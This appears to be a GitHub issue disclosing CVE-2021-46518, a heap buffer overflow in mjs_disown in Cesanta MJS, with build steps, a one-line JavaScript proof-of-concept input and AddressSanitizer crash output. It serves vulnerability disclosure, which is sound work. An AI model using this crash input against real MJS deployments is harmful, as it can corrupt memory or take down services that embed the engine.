Headline

CVE-2021-46518: Heap-buffer-overflow src/mjs_core.c:288 in mjs_disown · Issue #195 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_disown at src/mjs_core.c.

2 years ago

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

Comments

@hope-fly

mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile DOCKER_GCC=gcc DOCKER_CLANG=clang $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)

save the makefile then make

make

Test casepoc.js

(JSON.stringify([1, 2, 3]))(((JSON.stringify - 6.24321e2) - 6.54321e2)(JSON.stringify([1, 2, 3])));

Execution steps & Output

$ ./mjs/build/mjs poc.js

===ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000138 at pc 0x563a2f179088 bp 0x7fff18d361c0 sp 0x7fff18d361b0 READ of size 8 at 0x604000000138 thread T0 #0 0x563a2f179087 in mjs_disown src/mjs_core.c:288 #1 0x563a2f1c7b54 in mjs_json_parse src/mjs_json.c:480 #2 0x7fff18d3630f (<unknown module>)

Address 0x604000000138 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs_core.c:288 in mjs_disown Shadow bytes around the buggy address: 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff8000: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8010: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 =>0x0c087fff8020: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa 0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb

Credits: Found by OWL337 team.

1 participant

@hope-fly